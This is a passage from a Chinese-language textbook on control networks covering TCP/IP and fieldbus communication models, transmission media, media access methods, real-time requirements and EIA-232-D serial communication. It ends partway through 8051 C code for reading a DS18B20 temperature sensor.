在TCP/IP参考模型中,位于互联网层之上的一层,通常被称为传输层。它的功能是使源端和目标端主机上的对等实体可以进行会话,和OSI参考模型传输层的作用一样。这里定义了两个端到端的协议,第一个是传输控制协议(TCP),它是一个面向连接的协议,允许从一台机器发出的字节流无差错地发往互联网上的其他机器。它把输入的字节流分为报文段并传给互联网层,在接收端,TCP接收进程把收到的报文再组装成输出流。TCP还要处理流量控制,以避免快速发送方向低速接收方发送过多报文而使接收方无法处理。 第二个协议是用户数据报协议(UserDatagramProtocol,UDP),它是一个不可靠的无连接协议,用于不需要TCP的排序和流量控制能力而使自己完成这些功能的应用程序。它也被广泛地应用于只有一次的、客户/服务器模式的请求/应答查询,以及快速递交比准确递交更重要的应用程序,如传输语音或影像。TCP/IP模型中的协议与网络如图2⁃14所示,可在其中看出IP、TCP和UDP的关系。 3.应用层 TCP/IP参考模型没有会话层和表示层。传输层的上面是应用层,它包含所有的高层协议。最早引入的是虚拟终端协议(Telnet)、文件传输协议(FTP)和简单电子邮件协议(SMTP),如图2⁃14所示。虚拟终端协议允许一台机器上的用户登录到远程机器上并进行工作。文件传输协议提供了有效地把数据从一台机器移动到另一台机器的方法。电子邮件协议最初只是一种文件传输,但后来为它提出了专门的协议。这些年来又增加了不少协议,例如域名服务(DomainNameService,DNS)用于把主机名映射到网络地址;网络新闻传输协议(NNTP)用于传递新闻文章;还有超文本传输协议(HTTP),用于在万维网上获取主页等。 4.主机至网络层 互联网层的下层什么也没有,TCP/IP参考模型没有真正描述这一部分,只是指出主机必须使用某种协议与网络连接,以便能在其上传递IP分组。这个协议未被定义,并且随主机和网络的不同而不同。 2.2.3现场总线的通信模型 具有七层结构的OSI参考模型可支持的通信功能是相当强大的。作为一个通用参考模型,需要解决各方面可能遇到的问题,需要具备丰富的功能。作为工业数据通信的底层控制网络,要构成开放互联系统,应该如何制定和选择通信参考模型,七层OSI参考模型是否适应工业现场的通信环境,简化型是否更适合于控制网络的应用需求,这是应该首要考虑的问题。 工业生产现场存在大量的传感器、控制器、执行器等,它们通常相当离散地分布在一个较大的范围内。对由它们组成的控制网络,其单个节点面向控制的信息量不大,信息传递的任务也相对比较简单,但对实时性、快速性的要求较高。如果按照七层模式的参考模型,由于层间操作与转换的复杂性,网络接口的造价与时间开销显得过高。为满足实时性要求,也为了实现工业网络的低成本,现场总线采用的通信模型大多都在OSI参考模型的基础上进行了不同程度的简化。 几种典型现场总线的通信参考模型与OSI参考模型的对照如图2⁃15所示。可以看到,它们与OSI参考模型不完全保持一致,而是在OSI参考模型的基础上分别进行不同程度的简化,不过控制网络的通信参考模型仍然以OSI参考模型为基础。图2⁃15中的这几种控制网络,还在OSI参考模型的基础上增加了用户层。用户层是依据行业的应用需要,在施加某些特殊规定后形成的标准。 图2⁃15中的H1指IEC标准中的61158低速FF。它采用了OSI参考模型中的3层,即物理层、数据链路层和应用层,隐去了3~6层。应用层有两个子层:现场总线访问子层和现场总线信息规范子层。此外,还将从数据链路到FAS、FMS的全部功能集成为通信栈。在OSI参考模型基础上增加的用户层规定了标准的功能模块、对象字典和设备描述,供用户所需要的应用程序调用,并实现网络管理和系统管理。在网络管理中,设置了网络管理和网络管理信息库,提供组态管理、性能管理和差错管理的功能。在系统管理中,设置了系统管理内核、系统管理内核协议和系统管理信息库,实现设备管理、功能管理、时钟管理和安全管理等功能。 HSE即高速以太网,是H1的高速网段,也属于IEC的标准子集之一。它从物理层到传输层的分层模型与计算机网络中常用的以太网相同,应用层和用户层的设置与H1基本相当。图2⁃15中应用层的FDA指现场设备访问的是HSE的专有部分。PROFIBUS也是IEC的标准子集之一,也作为德国国家标准DIN19245和欧洲标准EN50170,采用了OSI参考模型的物理层、数据链路层。其DP型标准隐去了3~7层,而FMS型标准则隐去了3~6层,采用了应用层。此外,增加用户层作为应用过程的用户接口。图2⁃16是OSI参考模型与另外两种现场总线的通信参考模型的分层比较。其中,Lon⁃Works采用了OSI参考模型的全部七层通信协议,被誉为通用控制网络。图2⁃16中还给出了其他各分层的作用。 在图2⁃16中,作为ISO11898标准的CAN只采用了OSI参考模型的下面两层,即物理层和数据链路层。这是一种可以封装在集成电路芯片中的广泛应用的协议,要用它实际组成一个控制网络,还需要增加应用层或用户层以及其他约定。 2.3传输介质与介质访问控制方式 2.3.1传输介质 1.有线传输介质 (1)双绞线双绞线是计算机网络系统中最常用的一种传输介质,尤其在星形网络拓扑中,双绞线是必不可少的布线材料。如图2⁃17所示,每一对双绞线由两条互相绝缘的铜线规则绞合而成,其导线线径典型直径为1mm。这两条导线绞绕在一起,在传输过程中每根导线浮现的电波会被另一根上发出的电波抵消,因而降低了信号干扰程度。 (2)同轴电缆同轴电缆比双绞线的屏蔽性要更好,因此在更高速度上可以传输得更远。如图2⁃18所示,它以硬铜线为芯(导体),外包一层绝缘材料(绝缘层),这层绝缘材料再用密织的网状导体环绕构成屏蔽,其外部又覆盖一层保护性材料(护套)。同轴电缆的这种结构使它具有更高的带宽和极好的噪声抑制特性。1km的同轴电缆可以达到1~2Gbit/s的数据传输速率。 (3)光纤光纤是由一组光导纤维组成的用来传播光束、细小而柔韧的传输介质,又称光导纤维,如图2⁃19所示。核心、覆层和保护层是光纤线的三个主要部分。核心部分由纯净的玻璃或塑胶材料制成。覆层也是玻璃或塑料的,它包围着核心部分,光密度比核心部分低。在光纤的一端放置一个光源,如发光二极管(LED)或激光,两者都是电荷响应装置,可以产生光波脉冲,通常接近于红外线的频率(1.3×1012~4×1014Hz)。激光能够产生非常纯净的狭窄光束,同时,它有更高的电能输出,因此它的光比LED产生的光波传播得更远。LED产生的是包含许多波长的集中性较差的光,但它的价格比较便宜,而且通常使用寿命较长。光源发射出短而快速脉冲的光波,以各种不同的角度进入核心媒体。有些光基本上沿着媒体的中线传播,但有些光将以不同的角度撞击边界面,比如单步多模光纤,如图2⁃20所示。每一个角度都定义了一条路径或一种模式。以这种方式传输光波的光纤称为步率多模光纤(StepIndexMultimodeFiber)。角度(与水平线的夹角)大的光来回反射的频率比角度小的光高,经过的距离也较长。因此,它们到达光纤另一端就需要多一点的时间。这种现象称为模式散布(ModalDispersion)。 如果光纤太长的话,模式散布将成为一个问题。从一个脉冲产生出来的光波(反射角度较小)将有可能最终追上前一个脉冲所产生的光波(反射角度较大),从而消除两者的时间间隔。传感器检测到的将不再是光波的脉冲,而是一个持续稳定的光流。这样,脉冲中所有的编码信息都将丢失。 解决模式散布问题的办法之一是使用级率多模光纤(Graded⁃IndexMultimodeFiber)。如图2⁃21所示,级率多模光纤同样由核心、覆层和保护层构成。从核心放射状地向外移动,材料的光密度逐渐变小。因此,当光线放射状地向外传播时,它将逐渐向中心弯曲,最后被反射回来。最后的结果就是尽管有些光线传播距离较长,但它们的传播速度较快,这样模式散布的现象就减少了。 处理模式散布的另一种方法是消除它。把核心的直径减小到一定的程度,光纤内将只有以唯一一种模式传播的光波。这种光纤称为单模光纤(Single⁃ModeFiber),如图2⁃22所示。 要让反射体按照之前描述过的方式反射光线,反射体必须大于被反射光的波长。因为这里的反射体包围着核心媒体,所以它的大小取决于核心媒体的直径。频率与波长的关系是: 波长=光速/频率。穿越光纤的光线频率大约是1014Hz,所以其波长可以大概估计为2×10-6m,即2μm(1μm=10-6m)。单模光纤的直径通常以微米(μm)作为度量单位(一般为4~8μm,有时候更小)。 2.无线传输介质 利用无线电波在自由空间的传播可以实现多种无线通信。在自由空间传输的电磁波根据频谱不同可分为无线电波、微波、红外线、激光等,信息被加载在电磁波上进行传输。由于无线信道不需要铺设电缆,因此对于连接不同建筑物之间的局域网就特别有用。目前正在发展的无线局域网技术将获得广泛的应用。 (1)无线电波无线电波是指在自由空间(包括空气和真空)传播的射频频段的电磁波。射频(RadioFrequency,RF)表示辐射频率范围在300kHz~300GHz之间的电磁波。它是一种高频交流变化电磁波的简称。无线电技术是通过无线电波传播声音或其他信号的技术。 无线电技术的原理在于导体中电流强弱的改变会产生无线电波。利用这一现象,通过调制可将信息加载于无线电波之上。当电波通过空间传播到达收信端,电波引起的电磁场变化又会在导体中产生电流。通过解调将信息从电流变化中提取出来,就达到了信息传递的目的。 (2)微波微波传输属于一种视距传输,它沿直线传播,不能绕射,它是频率在108~1010Hz之间的电磁波。在100MHz以上,微波就可以沿直线传播,因此可以集中于一点。通过抛物线状天线把所有的能量集中于一小束,便可以防止他人窃取信号和减少其他信号对它的干扰,但是发射天线和接收天线必须精确地对准。由于微波沿直线传播,所以如果微波塔相距太远,地表就会挡住去路。因此,隔一段距离就需要一个中继站,微波塔越高,传输距离就越远。局域网可直接利用微波收发机进行通信,或作为中继接力扩大传输距离。微波通信被广泛用于长途电话通信、电视信号传播和其他方面的应用。 (3)红外线红外线通信与激光通信属于方向性极强的直线传播,发送方与接收方必须可以直视,中间没有阻挡。红外线的工作频率是1012~1014Hz。无导向的红外线被广泛用于短距离通信。利用红外线来传输信号,在收发端分别接有红外线的发送器和接收器。红外线有一个主要缺点:不能穿透坚实的物体,因此两者必须在可视范围内,中间不得有障碍。但正是由于这个原因,一间房屋里的红外系统不会对其他房间里的系统产生串扰,所以红外系统防窃听的安全性要比无线电系统好。例如电视机、录像机使用的遥控装置都利用了红外线装置。 (4)激光激光的工作频率为1014~1015Hz。激光通信是利用激光束来传输信号,即将激光束调制成光脉冲以传输数据,它与红外线一样不能传输模拟信号。激光通信必须配置一对激光收发器,且安装在视线范围内。由于激光信号是单向传输的,因此如果要连接两栋建筑物里的LAN,每栋楼房都得有自己的激光以及测光装置。激光具有高度的方向性,因而很难被窃听、插入数据和进行干扰,缺点是传输距离有限且易受环境(如大雨、浓雾、较强的沙尘暴等)的干扰。 2.3.2介质的访问控制方式 为解决在同一时间有几个设备同时发起通信而出现的争用传输介质的现象,需要采取某种介质访问控制方式,协调各设备访问介质的顺序。这种用于解决介质争用冲突的办法称为竞用技术。 通信中对介质的访问可以是随机的,即网络各节点可在任何时刻随意访问介质;也可以是受控的,即采用一定的算法调解各节点访问介质的顺序和时间。在计算机网络中,普遍采用载波监听多路访问/冲突检测(CarrierSenseMultipleAccesswithCollisionDetection,CSMA/CD)的随机访问方式来竞用总线。而在控制网络中往往会采用主从式、令牌总线、并行时间、多路存取等受控的介质访问控制方式。 1.载波监听多路访问/冲突检测 采用载波监听多路访问/冲突检测的介质访问控制方式时,网络上的任何节点都没有预定的通信时间,节点随机向网络发起通信。当遇到多个节点同时发起通信时,信号会在传输线上互相混淆而破坏,称为“冲突”。为尽量避免由于竞争引起的冲突,每个工作站在发送信息之前,都要侦听传输线上是否有信息在发送,这就是“载波监听”。载波监听CSMA的控制方案是先听再讲,一个节点要发送,首先需要监听总线,以决定介质上是否存在正在发送信号的其他节点。如果介质处于空闲,则可以发送;如果介质忙,则要等待一定时间间隔后重试。有3种CSMA坚持退避算法: 第一种:不坚持CSMA。假如介质是空闲的,则发送;假如介质是忙的,则等待一段随机时间,重复第一步。 第二种:1⁃坚持CSMA。假如介质是空闲的,则发送;假如介质是忙的,则继续监听,直到介质空闲,立即发送;假如冲突发生,则等待一段随机时间,重复第一步。 第三种:P⁃坚持CSMA。假如介质空闲,则以P的概率发送,或以1-P的概率延迟一个时间单位后再听,这个时间单位等于最大的传播延迟;假如介质是忙的,则继续监听直到介质空闲,重复第一步。 2.介质访问控制的令牌方式 CSMA的访问产生冲突的原因是由于各节点发起通信是随机的。为了解决冲突,可对通信发起采取某种方式进行控制。令牌访问就是其中一种,这种方法按一定的顺序在各站点间传输令牌,得到令牌的节点才有发起通信的权力,从而避免了几个节点同时发起通信而产生的冲突。令牌访问原理可用于环形网,构成令牌环形网络;也可以用于总线网,构成令牌总线网络。 令牌环是环形局域网采用的一种访问控制方式,令牌在网络环路上不断地传送,只有拥有此令牌的站点,才有权向环路上发送报文,而其他站点仅允许接收报文。一个节点发送完毕后,便将令牌交给网上的下一个站点,下一个站点如果没有报文发送,便立即把令牌按顺序依次传给它的下一个站点,因此表示发送权的令牌在环形信道上不断循环。环路上每个节点都可以获得发送报文的机会,而任何时刻只会有一个节点利用环路传送报文,因而在环路上保证不会发生访问冲突。图2⁃23a所示为令牌环中令牌传递的工作原理示意图。图中每个网络节点都有一个入口和一个出口分别与环形信道相连。在通信接口中用缓冲器来存储转发数据。图2⁃23b是网上传输的帧格式,它用起始标志表示帧头,目的地址是该帧的接收站地址,源地址是发送该帧的地址,报文即为帧中的数据,校验和用来表示对帧进行差错检查的结果,状态位则用来指示此帧发出后是否为目的站所接收,结束标志用来表示该帧的结尾。 若A站要发送数据给C站,则A站把目的地址和要发送的数据交给本站的通信处理器组织成帧。一旦A站从环上得到令牌,就发出该帧。B站从其入口收到此帧后,查看目的地址与本站地址不符,便将原帧依次转发给C站。C站在查看目的地址时,得知此帧是给本站的,便采用校验和差错检查。若传输的帧无错误,便将帧中的数据收下,并修改状态位,表示此帧已被正确接收,然后C站再把修改了状态位的原帧沿D、E站送回A站。A站从返回的帧的状态位得知发送成功,便从环上取消此帧,再把令牌转交给B站。这样就完成了一次站点间的通信过程。采用令牌环方式的局域网,网上每一个站点都知道信息的来去动向,保证了通信传输的正确性。由于能限制各节点的令牌持有时间,所以适合于实时系统的使用,令牌环方式对轻、重负载不敏感,但单环环路出故障将使整个环路通信瘫痪,因而可靠性比较差。 3.时分复用 时分复用(TimeDivisionMultiplexing,TDM)为每个节点预先分配好特定的一段时间,让每个节点在这段时间内占有总线。多个节点按划分的时间顺序占用总线的工作方式称为时分多路复用。比如让节点A、B、C、D分别按1、2、3、4的顺序占用总线。如果事先可以预计每个节点占用总线的时间、需要的通信时间或要传送的报文的字节数量,则可以准确估算出每个节点两次占用总线之间的循环周期。这在控制网络的应用条件下满足某种确定的时间要求是有用的。 时分复用又分为同步时分复用和异步时分复用两种。这里的“同步”与“异步”在意义上与前面位同步、帧同步中的同步的概念不同。同步时分复用指为每个节点分配相等的时间,而不管每个设备需要通信的数量大小。每当分配给某个节点的时间片到来时,该节点就可以发送数据,如果此时该节点没有数据要发送,则传输介质在该段时间片内是空的。这意味着同步时分复用的平均分配策略有可能造成通信资源的浪费,不能有效利用链路的全部容量。 4.并行时间域多路存取 并行时间域多路存取(ConcurrentTimeDomainMultipleAccess,CTDMA),是ControlNet网络系统通信中采用的特色技术之一。并行时间域多路存取是由通信系统中物理层与数据链路层所完成的功能。并行时间域多路存取依靠生产者/消费者通信模式来完成。报文数据的产生者(数据源)充当这一通信模式中的生产者,从网络中取用这一数据的节点称为消费者。并行时间域多路存取所发送的报文按内容辨识,当节点接收数据时,仅需识别与此报文相关联的特定标识符(Identifier),数据包不再需要目的地址,数据源只需将数据发送一次。多个需要该数据的节点通过在网上识别这个标识符,同时从网络中获取来自同一生产者的报文数据,因而称之为并行时间域多路存取。 2.4控制网络的特性 控制网络属于一种特殊类型的计算机网络,是用于完成自动化任务的网络系统。控制网络在节点的设备类型、传输信息的种类、网络所执行的任务、网络所处的工作环境等方面都有别于由普通PC或其他计算机构成的数据网络。这些测控设备的节点可能分布在工厂的生产装置、装配流水线、温室、粮库、堤坝、交通管制系统、各类运载工具车辆、环境监测、建筑、消防、家庭等各处,几乎涉及生产和生活的各个方面。 2.4.1控制网络的节点 作为普通计算机网络节点的PC或其他种类的计算机、工作站,当然也可以成为控制网络的一员。控制网络的节点大多都是具有计算与通信能力的测量控制设备,它们可能具有嵌入式CPU,但功能比较单一,其计算与其他能力也许远不及普通PC,没有键盘、显示等人机交互接口,甚至不带有CPU、单片机,只带有简单的通信接口。具有通信能力的以下设备都可以成为控制网络的节点成员: 1)限位开关、感应开关等各类开关。 2)条形码阅读器。 3)光电传感器。 4)温度、压力、流量、物位等各种传感器、变送器。 5)可编程序控制器(PLC)。 6)PID等数字控制器。 7)各种数据采集装置。 8)作为监视操作设备的监控计算机、工作站及其外设。 9)各种调节阀。 10)电动机控制设备。 11)变频器。 12)机器人。 13)作为控制网络连接设备的中继器、网桥、网关等。 受制造成本和传统因素的影响,作为控制网络节点的上述自控设备,其在计算能力等方面一般比不上普通计算机。把这些单个分散的有通信能力的测量控制设备作为网络的节点,连接成如图2⁃24所示的网络系统,使它们之间可以相互沟通信息,由它们共同完成自控任务,就构成控制网络。 2.4.2控制网络的任务与工作环境 控制网络以具有通信能力的传感器、执行器和测控仪表为网络节点,并将其连接成开放式、数字化、实现多节点通信和完成测量控制任务的网络系统。控制网络要将现场运行的各种信息传送到远离现场的控制室,在把生产现场设备的运行参数、状态以及故障信息等送往控制室的同时,又将各种控制、维护、组态命令等送往位于现场的测量控制现场设备中,起着现场及控制设备之间数据联系与沟通的作用。近年来,随着互联网技术的发展,已经开始对现场设备提出了参数的网络浏览和远程监控的要求。在有些应用场合,需要借助网络传输介质为现场设备提供工作电源。 与工作在办公室的普通计算机网络不同,控制网络要面临工业生产的强电磁干扰、各种机械振动和严寒酷暑的野外工作环境,因此要求控制网络能适应此类恶劣的工作环境。另外,自控设备千差万别,实现控制网络的互联与互操作往往十分困难,这也是控制网络必须解决的问题。 控制网络肩负的特殊任务和工作环境,使它具有许多不同于普通计算机网络的特点。控制网络的数据传输量相对较小,传输速率相对较低,多为短帧传送,但它要求通信传输的实时性强、可靠性高。网络的拓扑结构、传输介质的种类与特性、介质访问控制方式、信号传输方式和网络与系统管理等,都是影响控制网络性能的重要因素。为适应完成自控任务的需要,人们在开发控制网络技术时,注意力往往集中在满足控制的实时性要求、工业环境下的抗干扰、总线供电等控制网络的特定需求上。 2.4.3控制网络的实时性要求 计算机网络普遍采用以太网技术,采用带冲突监测的载波监听多路访问的媒体访问控制方式。一条总线上挂接多个节点,采用平等竞争的方式争用总线。节点要求发送数据时,先监听总线是否空闲,如果空闲就发送数据;如果总线忙就只能以某种方式继续监听,等总线空闲后再发送数据。即便如此还会有几个节点同时发送而发生冲突的可能性,因而称之为非确定性网络。计算机网络传输的文件、数据在时间上没有严格的要求,一次连接失败后还可 以继续要求连接。因此,这种非确定性不至于造成严重的后果。控制网络不同于普通数据网络的最大特点在于它必须满足对控制的实时性要求。实时控制往往要求对某些变量的数据准确定时刷新,这种对动作时间有实时性要求的系统称为实时系统。 实时系统的运行不仅要求系统动作在逻辑上的正确性,同时要求满足时限性。实时系统又分为硬实时和软实时两类。硬实时系统要求实时任务必须在规定的时限完成,否则会产生严重的后果;而软实时系统中的实时任务在超过了截止期后的一定时间内,系统仍可以执行处理。 由控制网络组成的实时系统一般为分布式实时系统。其实时任务通常是在不同节点上周期性执行的,任务的实时调度往往要求构成通信的调度具有确定性的网络系统。例如,一个控制网络由几个网络节点的PLC构成,每个PLC连接着各自下属的电气开关或阀门,由这些PLC共同控制管理着一个生产装置的不同部件的动作时序与时限,而且它们的动作需要严格互锁。对这个分布式实时系统来说,它应该满足实时性的要求。控制网络中传输的信息内容通常有生产装置运行参数的测量值、控制量、执行器状态、报警状态、系统配置组态、参数修改、零点量程调校、设备资源与维护信息等。其中,一部分参数的传输有实时性的要求,例如控制信息;一部分参数要求周期性刷新,例如参数的测量值与开关状态。而像系统组态、参数修改、趋势报告、调校信息等则对时间没有严格要求。所以,要根据各自的情况分别采取措施,从而让现有的网络资源能充分发挥作用,满足各方面的应用需求。 第3章 通用串行端口的数据通信 在串行通信中,两台或多台设备在通信过程中共享一条物理通路,接收者按一定的约定规则接收发送者依次逐位发送的一串数据信号。由于串行端口通常只是规定了物理层的接口规范,所以为确保每次传送的数据报文能准确到达目的地,使每一个接收者能够接收到所有发向它的数据,必须在通信连接上采取相应的措施。由于借助串行端口所连接的设备在功能、型号方面往往互不相同,其中大多数设备除了等待接收数据的任务外,还会有其他任务。比如一个数据采集处理单元需要周期性地收集和存储数据;一个控制器需要负责控制计算或向其他设备发送报文;一台设备作为接收方的同时还可能正在进行其他信息发送的任务。因此,为了保证串行通信的有效性,必须具备能应对多种工作状态的一系列规则。这里所讲的规则包括:设置通信帧的起始、停止位;建立连接握手;使用轮询或者中断来检测、接收信息;实行对接收数据的确认、数据缓存以及错误检查等。 3.1串行通信技术基础 3.1.1串行通信的基本概念 1.连接握手 通信帧的起始位可以引起接收方的注意,但发送方并不知道,也不能确认接收方是否已经做好了接收数据的准备。利用连接握手可以使收发双方确认已经建立了连接关系,接收方已经做好了准备,可以进入数据收发状态。连接握手过程是指发送者在发送一个数据块之前使用一个特定的握手信号来引起接收者的注意,表明要发送数据,接收者则通过握手信号回应发送者,说明它已经做好了接收数据的准备。 连接握手既可以通过软件方式实现,也可以通过硬件方式来实现。在软件连接握手方式中,发送者通过发送一个字节表明它想要发送数据;接收者看到这个字节时,也发送一个编码来声明自己可以接收数据;当发送者看到这个信息时,便知道它可以发送数据了。接收者还可以通过另一个编码来告诉发送者停止发送数据。在普通的硬件握手方式中,接收者在准备好接收数据的时候将相应的握手信号线变为高电平,然后开始全神贯注地监视它的串行输入端口的允许发送端。这个允许发送端与接收者的已准备好接收数据的信号端相连,发送者在发送数据之前一直在等待这个信号的变化,一旦得到信号,说明接收者已处于准备接收数据的状态,便开始发送数据。接收者可以在任何时候将握手信号线变为低电平,即便是在接收一个数据块的过程中也可以使这根导线变为低电平。当发送者检测到这个低电平信号时,就停止发送,而在完成本次传输之前,发送者还会继续等待握手信号线再次变为高电平,以继续被中止的数据传输。 2.确认 接收者为表明数据已经收到,向发送者回复信息的过程称为确认。有的传输过程可能会收到报文而不需要向相关节点回复确认信息,但在许多情况下,需要通过确认告知发送者数据已经收到。有的发送者需要根据是否收到确认信息来采取相应的措施,因而确认对某些通信过程是必需而且有用的。即便接收者没有其他信息要告诉发送者,也要为此单独发送一个数据确认已经收到信息。确认报文可以是一个特别定义的字节,如一个标识接收者的数值,发送者收到确认报文就可以认为数据传输过程正常结束,如果发送者没有收到所希望回复的确认报文,它就认为通信出现了问题,然后将采取重发或其他行为。 3.中断 中断是一个信号,它通知CPU有需要立即响应的任务。每个中断请求对应一个连接到中断源和中断控制器的信号,通过自动检测端口事件发现中断并转入中断处理。许多串行端口采用硬件中断,在串口发生硬件中断,或者一个软件缓存的计数器到达一个触发值时,表明某个事件已经发生,需要执行相应的中断响应程序,并对该事件做出及时的反应,这种过程也称为事件驱动。采用硬件中断就应该提供中断服务程序,以便在中断发生时让它执行所期望的操作,很多微控制器为满足这种应用需求而设置了硬件中断。在一个事件发生的时候,应用程序会自动对端口的变化做出响应,跳转到中断服务程序。例如发送数据、接收数据、握手信号变化、接收到错误报文等,都可能成为串行端口的不同工作状态,或称为通信中发生了不同事件,需要根据状态变化停止执行现行程序而转向与状态变化相适应的程序。外部事件驱动可以在任何时间插入并且使程序转向执行一个专门的应用程序。 4.轮询 通过周期性地获取特征值或信号来读取数据或发现是否有事件发生的工作过程称为轮询,这种方法需要足够频繁地轮询端口,以便不遗失任何数据或者事件。轮询的频率取决于对事件快速反应的需求以及缓存区的大小这两个因素。轮询通常用于计算机与I/O端口之间较短数据或字符组的传输。由于轮询端口不需要硬件中断,因此可以在一个没有分配中断的端口运行此类程序,很多轮询使用系统计时器来确定周期性读取端口的操作时间。 5.差错检验 所接收的数据是否正确,数据通信中的接收者可以通过差错检验的方法来判断。串行通信中常用的差错检验方法主要有冗余数据校验、奇偶校验、校验和、循环冗余校验等。 6.出错的简单处理 当一个节点检测到通信中出现差错或者接收到一条无法理解的报文时,应该尽量通知发送报文的节点,要求它重新发送或者采取其他措施来纠正。多次重发之后,如果这个差错仍不能为发送者所纠正,发送者应该跳过对这个节点的发送,发布一条出错消息,通过报文或者其他操作来通知操作人员发生了通信差错,并尽可能继续执行其他任务。接收者如果发现一条报文比期望的报文要短,应该重试,若最终失败则停止连接,并让主机知道出现了问题,而不能无休止地等待一个报文结束。主机可以决定让该报文继续发送、重发或者停发,不应因发现问题而让网络处于无休止的等待状态。 3.1.2串行异步通信数据格式 无论是EIA⁃232接口,还是EIA⁃485接口,均可采用串行异步收发数据格式。在串行端口的异步传输过程中,数据会在什么时候到达,接收方一般事先是不知道的,在它检测到数据并做出响应之前,第一个数据位就已经过去了。因此,每次异步传输都应该在发送的数据之前设置至少一个起始位,以通知接收方数据到达,给接收方一个准备接收数据、缓存数据和做出其他响应所需要的时间,而在传输过程结束时,则应由一个停止位通知接收方本次传输过程已经终止,以便接收方正常终止本次通信转入其他工作。若通信线上无数据发送,该线路应处于逻辑0状态(高电平)。当计算机向外发送一个字符数据时,应先送出起始位(逻辑1,低电平),随后紧跟着数据位,这些数据构成是要发送的字符信息。有效数据位的个数可以规定为5、6、7或8位(bit)。奇偶校验位根据设定随后传送,紧跟其后的是停止位(逻辑0,高电平),其位数可在1、1.5和2中选择其一。 3.2EIA⁃232⁃D串行通信接口技术 EIA⁃232⁃D是美国电子工业协会(ElectronicIndustriesAssociation,EIA)在1969年制定的RS⁃232⁃C标准基础上推行的物理接口标准,C指代标准的第三版,D指代标准的第四版。1987年1月修订后正式定名为EIA⁃232⁃D。 3.2.1EIA⁃232⁃D接口 1.EIA⁃232⁃D的物理特性 EIA⁃232⁃D的连接插口用25针或9针的EIA接口D型连接插头(座),其物理外观如图3⁃2所示。 2.端子功能分配 EIA⁃232⁃D连接插头的端子功能分配见表3⁃1。 3.信号含义 (1)从计算机到MODEM的信号 DTR:数据终端(DTE)准备好,告诉MODEM计算机已经接通电源,并准备好了RTS:请求发送,告诉MODEM现在需要发送数据。 (2)从MODEM到计算机的信号 DSR:数据设备(DCE)准备好,告诉计算机MODEM已接通电源,并准备好了。 CTS:发送清零,告诉计算机MODEM已做好了接收数据的准备。 DCD:数据信号检测,告诉计算机MODEM已与对端的MODEM建立了连接。 RI:振铃指示器,告诉计算机对端电话已经在振铃了。 (3)数据信号 TXD:发送数据。 RXD:接收数据。 4.电气特性 EIA⁃232⁃D的电气线路连接方式如图3⁃3所示。 其接口为非平衡型,每个信号用一根导线,所有信号回路共用一根地线。信号速率限于20kbit/s内,电缆长度限于15m内,由于是单线,线间干扰较大,其电性能用±12V标准脉冲。要注意的是EIA⁃232⁃D采用负逻辑。 在数据线上:传号Mark=-15~-5V,逻辑“1”电平; 空号Space=+5~+15V,逻辑“0”电平。 在控制线上:通On=+5~+15V,逻辑“0”电平; 断Off=-15~-5V,逻辑“1”电平。 EIA⁃232⁃D的逻辑电平与TTL电平不兼容,为了使其与TTL器件相连,必须进行电平转换。 由于EIA⁃232⁃D采用电平传输,在通信速率为19.2kbit/s时,其通信距离只有15m。想要延长通信距离,就必须降低通信速率。 3.2.2EIA⁃232⁃D通信接口的互联 当两台计算机经EIA⁃232⁃D接口直接通信时,通信线路可用图3⁃4和图3⁃5所示的方式来实现。虽然不接MODEM,但图中仍连接着有关的MODEM信号线,这是由于INT14H 中断使用这些信号。假如程序中没有调用INT14H,在自编程序中也没有用到MODEM的有关信号,两台计算机直接通信时,只连接2、3、7(25针EIA)或3、2、5(9针EIA)就可以了。 3.2.3EIA⁃232⁃D驱动器/接收器 要使得采用+5V供电的TTL和CMOS通信接口电路能与EIA⁃232⁃D标准接口连接,必须进行串口输入/输出信号的电平转换。目前常用的电平转换器有Motorola公司生产的MC1488驱动器、MC1489接收器,美国德州仪器(TI)公司的SN75188驱动器、SN75189接收器以及美国Maxim公司生产的单一+5V电源供电、多路EIA⁃232⁃D驱动器/接收器,如MAX232A等。单一+5V电源供电的EIA⁃232⁃D电平转换器还有TL232/ICL232等。 MAX232A内部具有双充电泵电压变换器,把+5V变换成+10V,作为驱动器的电源,具有两路发送器及两路接收器,使用特别方便。 3.2.4EIA⁃232⁃D串行通信在温度采集系统中的应用 1.温度采集系统构成 本温度采集系统用于室内环境温度的采集,由嵌入式温度采集卡、上位机系统和通信链路构成。嵌入式采集卡用于温度数据的采集与格式转换,由单片机和温度传感器构成,通过通信链路发送给上位机系统;上位机系统接收采集卡的温度数据,显示并比较存储温度数据,以便发出下一步的控制指令。该采集系统对通信链路的要求较简单,距离较近,采用点对点通信,无须考虑组网等。基于以上需求,可以采用EIA⁃232⁃D串行通信方式,该通信方式在较近距离具有通信速度快、硬件电路简单、上位机软件开发简洁和接口标准等特点。 温度采集卡可采用常见的51单片机构成,它可以胜任温度采集、运算与传送工作,而且成本低廉、性能稳定、技术成熟。温度传感器采用单片数字温度传感器DS18B20,该传感器具有采集数据精确、数字化通信、通信线路精简等特点,可以满足室内外温度采集的需求。 2.通信参数的设置 EIA⁃232⁃D通信的核心参数是通信波特率,通信双方只有在相同波特率下才能正常通信。对于采集卡,51单片机采用定时器作为波特率发生器,设置波特率即设置定时器参数。当51 单片机串行通信设为模式1时,由定时器T1作为波特率发生器,使其工作在模式2。波特率由T1的溢出率与SMOD位确定 计算关系式为 波特率= 2 SMOD 32 × f osc 12×(256-X) (3⁃1) 式中,fosc为单片机晶振频率,为12MHz。当取SMOD为0,X为0(TH1=TL1=00H)时,可得到最小波特率约为122bit/s;当取SMOD为1,X为255(TH1=TL1=FFH)时,可得到最大波特率约为62500bit/s。根据单片机通信特点与温度采集实际需要,采用9600bit/s作为通信波特率,兼顾了速度与稳定性。上位机的波特率通过上位机与显示界面设置。 3.下位机系统软件设计 #include<reg52.h> #defineucharunsignedchar #defineuintunsignedint sbitDS=P2^2;//定义传感器引脚 uinttemp;//定义温度值存储变量 ucharflag1;//定义结果标志位 voiddelay(uintcount)//延时 { uinti; while(count) { i=200; while(i>0) i--; count--; } } //功能:串口初始化,波特率为9600bit/s,方式1 voidInit_Com(void) { TMOD=0x20; PCON=0x00; SCON=0x50; TH1=0xFd; TL1=0xFd; TR1=1; } voiddsreset(void)//发送复位命令 { uinti; DS=0; i=103; while(i>0)i--; DS=1; i=4; while(i>0)i--; } bittmpreadbit(void)//传感器读一位数据 { uinti; bitdat; DS=0;i++;//i++起延时作用 DS=1;i++;i++; dat=DS; i=8;while(i>0)i--; return(dat); } uchartmpread(void)//传感器读一个字节数据 { uchari,j,dat; dat=0; for(i=1;i<=8;i++) { j=tmpreadbit(); 